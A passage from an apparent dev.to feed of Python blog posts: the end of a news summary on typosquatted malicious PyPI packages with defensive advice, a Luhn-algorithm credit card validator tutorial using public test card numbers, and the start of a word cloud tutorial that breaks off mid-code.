&lt;p&gt;Unfortunately, this security feature can be exploited. In 2016, &lt;a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/"&gt;research&lt;/a&gt; proved that PyPI could be exploited through &lt;a href="https://en.wikipedia.org/wiki/Typosquatting"&gt;typosquatting&lt;/a&gt;. The researcher uploaded some harmless "simulation malware" to PyPI under names that were misspelled versions of popular package names, in order to collect data on how often these misspelled packages were installed. If a script kiddie or black-hat hacker was doing this then they could have used a much more malicious script.&lt;/p&gt;

&lt;h2&gt;
  
  
  Malware on PyPI
&lt;/h2&gt;

&lt;p&gt;On July 28, 2022 &lt;a href="https://blog.sonatype.com/ransomware-in-a-pypi-sonatype-spots-requests-typosquat"&gt;researchers at Sonatype&lt;/a&gt; discovered malicious code on PyPI. The packages were named &lt;code&gt;"requesys,"&lt;/code&gt; &lt;code&gt;"requesrs,"&lt;/code&gt; and &lt;code&gt;"requesr,"&lt;/code&gt; which are all common typosquats of &lt;code&gt;"requests"&lt;/code&gt; — a legitimate and widely used HTTP library for Python. Sonatype immediately reported this incident to PyPI's administrators, and two of the packages have since been removed.  &lt;/p&gt;

&lt;p&gt;According to the researchers at Sonatype, the packages (&lt;code&gt;requesys&lt;/code&gt;) was downloaded about 258 times, presumably by developers who made typographical errors when attempting to download the real &lt;code&gt;"requests"&lt;/code&gt; package. One version of the &lt;code&gt;requesys&lt;/code&gt; package contained the encryption and decryption code in plaintext Python. But a subsequent version contained a Base64-obfuscated executable that made analysis a little harder, according to Sonatype.&lt;/p&gt;

&lt;h3&gt;
  
  
  Nothing harmful found
&lt;/h3&gt;

&lt;p&gt;According to Sonatype, developers who ended up with their system encrypted received a pop-up message instructing them to contact the author of the package for the decryption key.  Victims were able to obtain the decryption key without having to make a payment for it. Which according to Sonatype, &lt;em&gt;"makes this case more of a gray area rather than outright malicious activity."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Information on the hacker's Discord channel shows that at least 15 victims had installed and run the package.&lt;/p&gt;

&lt;h2&gt;
  
  
  A Growing Threat
&lt;/h2&gt;

&lt;p&gt;This event is one of an increasing number of recent occurrences where hackers have hidden harmful code in commonly used software repositories in an effort to lure developers into downloading and installing it in their environments. For instance, Sonatype discovered in May that 300 developers had mistakenly downloaded &lt;code&gt;"Pymafka,"&lt;/code&gt; a malicious program for disseminating Cobalt Strike, from the PyPI registry thinking it was the popular and trustworthy Kafka client &lt;code&gt;"PyKafka."&lt;/code&gt; &lt;/p&gt;

&lt;p&gt;In July, researchers at Kaspersky discovered &lt;a href="https://www.darkreading.com/risk/malicious-npm-packages-discord-tokens-credit-card"&gt;four information-stealing packages in the Node Package Manager&lt;/a&gt; (npm) repository. &lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Hopefully after reading this article, you now realize why it is important to pay close attention to what you download from public code repositories such as PyPI. Security researchers state that organizations must pay closer attention to their software supply chains — especially when it comes to using open source software from public repositories such as PyPI. Remember, as a Python developers, it is always your responsibility to ensure your packages are secure. Be very careful when typing out the names of popular libraries, as &lt;code&gt;typosquatting&lt;/code&gt; is one of the most common methods for this exploitation. &lt;/p&gt;

&lt;p&gt;Additionally, it behooves you to take preemptive measure to protect your files in your day-to-day operations. Use a trusted antivirus and malware protection software, use secure &amp;amp; strong passwords, always use secure internet connections, and always, always, always — &lt;em&gt;backup your data!&lt;/em&gt; &lt;/p&gt;

&lt;p&gt;If you found this article helpful or have any questions please leave a comment. &lt;/p&gt;

</description>
      <category>python</category>
      <category>programming</category>
      <category>security</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Validate Credit Card Numbers using Python</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Tue, 02 Aug 2022 00:25:00 +0000</pubDate>
      <link>https://dev.to/seraph776/validate-credit-card-numbers-using-python-37j9</link>
      <guid>https://dev.to/seraph776/validate-credit-card-numbers-using-python-37j9</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;The purpose of this article is to explain how to write a simple credit card validator using Python. The algorithm that will be used to verify card numbers is called the &lt;em&gt;Luhn algorithm&lt;/em&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  About Luhn's Algorithm
&lt;/h2&gt;

&lt;p&gt;The Luhn algorithm was developed by German computer scientist Hans Peter Luhn in 1954. The algorithm also known as the "&lt;em&gt;modulus 10 algorithm&lt;/em&gt;," is a check sum formula used to validate a variety of identification numbers including credit card numbers. &lt;/p&gt;

&lt;p&gt;Most credit cards, and many government identification numbers use the algorithm as a simple method of distinguishing valid numbers from mistyped or otherwise incorrect numbers. It is not intended to be a cryptographically secure hash function; instead, it was created to detect accidental errors rather than defend against malicious attacks.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Algorithm Works
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;The Luhn algorithm starts from the last digit which is called the &lt;em&gt;check digit&lt;/em&gt;. Then moving left from this check digit (&lt;code&gt;←&lt;/code&gt;), double the value of every digit at even indices.&lt;/li&gt;
&lt;li&gt;If the result of this doubling operation is greater than 9 (e.g., &lt;em&gt;6 × 2 = 12&lt;/em&gt;), then subtract 9 from the result (e.g., &lt;em&gt;12: 12 − 9 = 3&lt;/em&gt;) or, equivalently, add the digits of the result (e.g., &lt;em&gt;12: 1 + 2 =3&lt;/em&gt;). &lt;/li&gt;
&lt;li&gt;Now sum all the digits (including the check digit).&lt;/li&gt;
&lt;li&gt;If the total is divisible by 10 then the number is valid; otherwise, it is not valid.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Implementing Luhn's Algorithm using Python
&lt;/h2&gt;

&lt;p&gt;The solution below will take a string argument called '&lt;em&gt;credit_number&lt;/em&gt;' which represent the credit card number that will  be verified. The pseudo-code below will help explain the steps taken for each line of code.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pseudo-code
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Change string to list datatype&lt;/li&gt;
&lt;li&gt;Remove last digit (&lt;em&gt;check digit&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;Reverse remaining digits&lt;/li&gt;
&lt;li&gt;Double digits at even indices&lt;/li&gt;
&lt;li&gt;Subtract 9 if over 9&lt;/li&gt;
&lt;li&gt;Add the check digit back to the list
&lt;/li&gt;
&lt;li&gt;Sum all digits&lt;/li&gt;
&lt;li&gt;If the sum is divisible by 10 then it is valid; otherwise, Invalid
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="s"&gt;"""This function validates a credit card number."""&lt;/span&gt;
    &lt;span class="c1"&gt;# 1. Change datatype to list[int]
&lt;/span&gt;    &lt;span class="n"&gt;card_number&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;num&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# 2. Remove the last digit:
&lt;/span&gt;    &lt;span class="n"&gt;checkDigit&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# 3. Reverse the remaining digits:
&lt;/span&gt;    &lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reverse&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="c1"&gt;# 4. Double digits at even indices
&lt;/span&gt;    &lt;span class="n"&gt;card_number&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
                   &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;

    &lt;span class="c1"&gt;# 5. Subtract 9 at even indices if digit is over 9
&lt;/span&gt;    &lt;span class="c1"&gt;# (or you can add the digits)
&lt;/span&gt;    &lt;span class="n"&gt;card_number&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;9&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;9&lt;/span&gt;
                   &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;

    &lt;span class="c1"&gt;# 6. Add the checkDigit back to the list:
&lt;/span&gt;    &lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;checkDigit&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# 7. Sum all digits:
&lt;/span&gt;    &lt;span class="n"&gt;checkSum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;card_number&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# 8. If checkSum is divisible by 10, it is valid.
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;checkSum&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s"&gt;'__main__'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# American Express
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'378282246310005'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'371449635398431'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="c1"&gt;# American Express Corporate
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'378734493671000'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="c1"&gt;# Australian BankCard
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'5610591081018250'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="c1"&gt;# Diners Club
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'30569309025904'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'38520000023237'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="c1"&gt;# Discover
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'6011111111111117'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'6011000990139424'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="c1"&gt;# MasterCard
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'5555555555554444'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'5105105105105100'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="c1"&gt;# Visa
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'4111111111111111'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'4012888888881881'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# True
&lt;/span&gt;
    &lt;span class="c1"&gt;# Invalid Credit Card Number
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'7762888103111881'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# False
&lt;/span&gt;    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;validate_credit_card&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'37612555227841800'&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="c1"&gt;# False
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is one solution on how to implement a simple credit card validator using Python. You can check the validity of the number using with this &lt;a href="https://www.freeformatter.com/credit-card-number-generator-validator.html"&gt;credit card validator&lt;/a&gt;. &lt;/p&gt;

&lt;p&gt;There are available Python libraries that can be downloaded which would make it easier to include Luhn-based identification number verification in software applications.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pypi.org/project/luhn/"&gt;luhn&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pypi.org/project/fast-luhn/"&gt;fast-luhn&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;This article discussed the &lt;em&gt;Luhn Algorithm&lt;/em&gt; and how to implement a credit card validator using Python. Hopefully you have a better understanding on how the algorithm works, and can write your own credit card number validator using Python. If you found this article helpful or have any questions, please leave a comment.&lt;/p&gt;




&lt;p&gt;Code available at &lt;a href="https://github.com/seraph776/DevCommunity/tree/main/CreditCardValidator"&gt;GitHub&lt;/a&gt;&lt;/p&gt;

</description>
      <category>python</category>
      <category>programming</category>
      <category>algorithms</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Generate Word Cloud using Python</title>
      <dc:creator>Seraph★776</dc:creator>
      <pubDate>Tue, 26 Jul 2022 18:39:00 +0000</pubDate>
      <link>https://dev.to/seraph776/generate-word-cloud-using-python-2hoc</link>
      <guid>https://dev.to/seraph776/generate-word-cloud-using-python-2hoc</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;A word cloud (also called tag cloud or weighted list) is a visual representation of text data. Words are usually single words, and the importance of each is shown with font size or color. This article will discuss how to generate a Word Cloud using Python. &lt;/p&gt;

&lt;p&gt;📚 Python Libraries&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;wordcloud&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Counter&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;re&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;os&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Input File
&lt;/h2&gt;

&lt;p&gt;For the input file, you need a file that contains text. You can use a site like &lt;a href="https://www.gutenberg.org/" rel="noopener noreferrer"&gt;Project Gutenberg&lt;/a&gt; to find books that are available online. You can generate word clouds from famous books such as &lt;a href="https://www.gutenberg.org/ebooks/11" rel="noopener noreferrer"&gt;Alice in Wonderland&lt;/a&gt; by Lewis Carroll or &lt;a href="https://www.gutenberg.org/ebooks/345" rel="noopener noreferrer"&gt;Dracula&lt;/a&gt; by Bram Stoker. The possibilities are endless. This project used &lt;a href="https://www.poetryfoundation.org/poems/48860/the-raven" rel="noopener noreferrer"&gt;The Raven&lt;/a&gt; by Edgar Allan Poe. Simply copy the contents into a text file and save it in the same directory as the Python script.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation
&lt;/h2&gt;

&lt;p&gt;We need to write a function that will open this text file, iterate through the words, remove punctuation, and count the frequency of each word. We must also make sure to ignore word case, words that do not contain all alphabets, and common words like &lt;code&gt;"and"&lt;/code&gt; or &lt;code&gt;"the"&lt;/code&gt;.  We will follow these 5 basic steps to implement the word cloud.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Import Necessary libraries&lt;/li&gt;
&lt;li&gt;Open Text file&lt;/li&gt;
&lt;li&gt;Clean Text file&lt;/li&gt;
&lt;li&gt;Generate Word cloud&lt;/li&gt;
&lt;li&gt;Save Word cloud&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Step 1: Import the necessary libraries
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;wordcloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WordCloud&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;collections&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Counter&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;re&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;The &lt;a href="https://pypi.org/project/wordcloud/" rel="noopener noreferrer"&gt;WordcCloud&lt;/a&gt; library is what generate the wordcloud. &lt;/li&gt;
&lt;li&gt;The &lt;code&gt;Counter&lt;/code&gt; module is used to create a &lt;code&gt;dictionary&lt;/code&gt; that will count the frequency of each word. &lt;/li&gt;
&lt;li&gt;The &lt;code&gt;re&lt;/code&gt; module used to remove punctuations from the text file.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;os&lt;/code&gt; module is used for file handling&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Step 2: Open the text file
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;encoding&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;utf-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;file_object&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;word&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;lower&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;word&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;file_object&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;get_file()&lt;/code&gt; function will open the text file using &lt;code&gt;UTF-8&lt;/code&gt; encoding, and returns content of file.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Clean Text file
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;clean_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;re&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sub&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;r&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;[^\w\s]&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;stopwords&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;a&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;an&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;and&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;as&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;at&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;but&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;by&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;from&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;he&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;him&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;i&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;is&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span 